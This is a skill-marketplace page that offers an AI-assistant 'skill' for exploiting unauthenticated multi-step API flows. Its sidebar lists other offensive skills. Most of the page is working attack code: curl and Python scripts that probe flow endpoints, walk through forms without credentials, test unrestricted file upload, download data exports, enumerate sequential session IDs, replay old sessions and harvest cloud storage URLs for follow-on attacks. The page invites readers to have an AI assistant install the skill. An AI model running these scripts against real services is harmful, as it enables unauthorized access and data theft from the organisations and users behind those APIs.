ワンクリックで
unauth-api-flow-hijack
Exploit unauthenticated multi-step API flows without credentials.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
メニュー
Exploit unauthenticated multi-step API flows without credentials.
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | unauth-api-flow-hijack |
| description | Exploit unauthenticated multi-step API flows without credentials. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, python3 |
| metadata | {"tags":["recon","API","unauthenticated","flow","interview","form","upload","export"],"category":"recon","related_skills":["api-noauth-hunt","hardcoded-credential-hunt","hunt-write-gap","hunt-idor"]} |
Exploit API endpoints that implement a full business workflow (interview, application, checkout, onboarding) without requiring authentication at any step. Unlike simple data exposure, these flows allow an attacker to participate in — and manipulate — the application's core business logic: submitting forms, uploading files, completing transactions, and exporting data. The entire state machine is accessible without credentials.
terminal tool with curl and python3.# Probe common flow-starting endpoints
for ep in /start /api/start /api/v1/start /begin /init /api/init \
/start-interview /api/interview/start /api/session/start; do
code=$(curl -sk -o /tmp/resp.json -w "%{http_code}" \
-X POST "https://target.com$ep" \
-H "Content-Type: application/json" -d '{}')
if [ "$code" = "200" ] || [ "$code" = "201" ]; then
echo "=== $ep ($code) ==="
cat /tmp/resp.json | python3 -m json.tool 2>/dev/null | head -20
# Extract any returned ID
cat /tmp/resp.json | python3 -c "
import sys,json,re
try:
d=json.load(sys.stdin)
for k in d:
if any(x in k.lower() for x in ['id','token','session','key']):
print(f'{k}: {d[k]}')
except: pass
"
fi
done
Identify all steps by following the API's natural progression:
import requests, json
BASE = "https://target.com"
session = requests.Session()
# Step 1: Start the flow
r = session.post(f"{BASE}/api/flow/start", json={})
data = r.json()
flow_id = data.get("id") or data.get("sessionId") or data.get("token")
print(f"Started: {flow_id}")
# Step 2-N: Follow the flow by submitting whatever the API asks for
for step in range(1, 20):
# Try generic submissions — the API's error messages will guide you
r = session.post(f"{BASE}/api/flow/submit", json={
"id": flow_id,
"answer": "test response",
"data": {"key": "value"}
})
resp = r.json()
print(f"Step {step}: {resp.get('currentStep', '?')} — {resp.get('message', '')[:80]}")
# Check for completion or blocked paths
if resp.get("complete") or resp.get("error"):
break
# Extract any requirements from the message
if "required" in str(resp).lower() or "invalid" in str(resp).lower():
print(f" Validation: {json.dumps(resp)[:200]}")
If the flow includes file upload, test for unrestricted upload:
# Test file upload without auth
curl -sk -X POST "https://target.com/api/flow/upload" \
-F "file=@test.pdf;type=application/pdf" \
-F "id=$FLOW_ID" | python3 -m json.tool
# The response often returns a public URL for the uploaded file
# Check if uploads are stored in a public bucket
Many flows offer export/download at completion:
# Test export without auth
curl -sk "https://target.com/api/flow/export" -o export.xlsx
file export.xlsx # Check if it's a real file with data
# Try export with different format parameters
for fmt in xlsx csv json pdf xml; do
curl -sk "https://target.com/api/flow/export?format=$fmt" -o "export.$fmt"
[ -s "export.$fmt" ] && echo "export.$fmt: $(wc -c < export.$fmt) bytes"
done
If session IDs are predictable or exposed, enumerate other sessions:
# Check if IDs are sequential or enumerable
for id in $(seq 1 100); do
code=$(curl -sk -o /dev/null -w "%{http_code}" \
"https://target.com/api/flow/status/$id")
[ "$code" = "200" ] && echo "Active: $id"
done
# Test if old session IDs can be replayed
curl -sk -X POST "https://target.com/api/flow/submit" \
-H "Content-Type: application/json" \
-d '{"id": "OLD_SESSION_ID", "answer": "replay test"}'
If uploads go to a cloud storage bucket, chain with cloud attack skills:
# Extract storage URLs from upload responses
curl -sk -X POST "https://target.com/api/flow/upload" \
-F "file=@test.pdf" \
-F "id=$FLOW_ID" | python3 -c "
import sys, json, re
data = sys.stdin.read()
for url in re.findall(r'https?://[^\s\"<>]+\.(?:supabase\.co|amazonaws\.com|storage\.googleapis\.com)[^\s\"<>]*', data):
print(f'STORAGE_URL: {url}')
"
api-noauth-hunt — Detecting API endpoints that lack authentication.hardcoded-credential-hunt — Finding passwords that unlock privileged steps within the flow.hunt-write-gap — POST/PUT endpoints that accept writes without requiring read authentication.hunt-idor — Exploiting insecure direct object references within flow session IDs.firebase-supabase-attack — If uploads go to Supabase/Firebase storage.